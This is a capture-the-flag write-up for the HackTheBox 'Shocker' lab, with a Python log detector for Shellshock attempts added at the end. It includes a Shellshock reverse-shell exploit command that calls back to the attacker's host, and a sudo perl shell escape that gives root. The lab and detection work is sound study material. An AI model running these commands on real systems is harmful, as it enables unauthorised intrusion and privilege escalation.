Shocker

Name: Shocker
Release Date: 30 Sep 2017
Retire Date: 17 Feb 2018
OS: Linux
Base Points: Easy - Retired [0]
dostoevskylabs 00 days, 03 hours, 16 mins, 45 seconds
dostoevskylabs 00 days, 03 hours, 27 mins, 27 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56

 
$ nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 15:22 EDT
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.38 seconds
 

We've got HTTP and SSH on a non-standard port.  Let's try Gobuster and see what happens.  I'm going to add the cgi, sh, pl and py extensions.  Let me explain why.  The box name is Shocker and it's an Ubuntu box.  In 2014, Shellshock was ALL the rage.  SHOCKING, I know!


........................

........................

........................

........................

(I'll see myself out)


Anyway.  CGI scripts were particularly susceptible to Shellshock-based attacks, because the web server hands request headers to the script as environment variables, which is exactly where the bash bug triggers.  So, let's see if there are any scripts in cgi-bin.

 
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.56/cgi-bin  -x cgi,sh,pl,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     py,cgi,sh,pl
[+] Timeout:        10s
===============================================================
2020/07/16 16:22:06 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.pl (Status: 403)
/.htaccess (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.pl (Status: 403)
/.htaccess.py (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/07/16 16:26:28 Finished
===============================================================
 

We do see a script inside /cgi-bin.  Exploit-DB has a nice manual exploit (because, again, Metasploit makes us lazy) that we can use, but let's check out the webpage itself first.

Huh?  I wonder how mrb3n got a picture of me before coffee...  Just keeping the levity.  Let's jump straight to exploiting Shellshock.  Copy the exploit code into whatever text editor you prefer.  The best part is that it needs no modifications.  Run the exploit with:

 

./shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=9999 pages=/cgi-bin/user.sh

 

and we have a foothold as "shelly".  Cute.  Could be Shelly as in shell, or Shelly as in Shellshock...  I like it.  Move LinEnum.sh over to the /tmp folder and run it.  The output is in the CTB file.  The one thing that jumps out is that we can run "sudo /usr/bin/perl" without a password.  So, if we have perl exec a shell for us with:

 

sudo /usr/bin/perl -e 'exec "/bin/sh"'

 

we land in a root shell and should be able to grab all of the flags.
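For the blue-team side of this box: the Shellshock request against /cgi-bin/user.sh leaves a very recognisable trace in Apache's combined access log, because mod_cgi exports request headers such as User-Agent and Referer into the script's environment, and that is where the "() {" function-definition marker lands.  The following is an added example, not part of the writeup or of the Exploit-DB script; the log lines, the 10.10.14.3 attacker address and the harmless "echo vulnerable" self-test string are all constructed.

```python
import re

# Apache "combined" log format:
# host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock triggers when an environment variable's value starts with a
# bash function definition.  mod_cgi copies headers into the CGI process
# environment (HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE, ...), so "() {"
# inside a logged header is the tell-tale marker of an attempt.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def find_shellshock_attempts(log_lines):
    """One record per request whose Referer or User-Agent carries the marker.
    hit_cgi tells whether the path is a CGI script, i.e. whether the header
    would actually have reached a bash process rather than a static file."""
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "status": int(m.group("status")),
                    "field": field,
                    "hit_cgi": m.group("path").startswith("/cgi-bin/"),
                })
    return hits


# Constructed sample lines (not taken from the box); the marker string is the
# classic harmless Shellshock self-test, not a working payload.
SAMPLE_LOG = [
    '10.10.14.3 - - [16/Jul/2020:15:30:01 -0400] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.3 - - [16/Jul/2020:15:30:02 -0400] "GET /index.html HTTP/1.1" 200 137 "http://10.10.10.56/" "Mozilla/5.0"',
    '10.10.14.3 - - [16/Jul/2020:16:40:12 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo vulnerable"',
    '10.10.14.3 - - [16/Jul/2020:16:40:13 -0400] "GET /index.html HTTP/1.1" 200 137 "() { :; }; echo vulnerable" "curl/7.68.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

Only the third line is the real concern (marker in a header on a request that reached a CGI script); the fourth shows the same marker hitting a static page, which is noise worth logging but cannot have executed.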